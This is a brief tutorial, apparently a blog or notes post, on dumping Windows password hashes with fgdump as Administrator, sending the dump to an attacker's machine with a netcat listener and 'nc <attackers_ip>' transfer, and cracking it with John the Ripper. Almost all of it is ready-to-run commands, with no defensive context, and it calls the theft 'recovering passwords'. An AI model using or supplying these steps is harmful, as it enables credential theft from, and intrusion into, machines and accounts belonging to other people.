Tools used: fgdump, john the ripper
On target machine as Administrator:
C:\> fgdump.exe -c # dumps passwords from local windows box to 127.0.0.1.pwdump file
we use netcat to send dumped hashes to attacker's machine, attacker's machine:
$ nc -l -p 2222 > sam.txt
target machine:
C:\> nc <attackers_ip> 2222 < 127.0.0.1.pwdump
On attacker's machine:
$ ./john --session=recovery1 127.0.0.1.pwdump
We can stop guessing session with ^C and restore it with:
$ ./john --session=recovery1
Spacebar shows us speed of recovery. Recoverd passwords are in john.pot file, to save them in a file:
$ john --show 127.0.0.1.pwdump > 127.0.0.1.cracked.txt
It's basic use scenario of recovering passwords. There's more about john (modes of operation, distributing computation among several machines, optimizing key space). More on it in future.
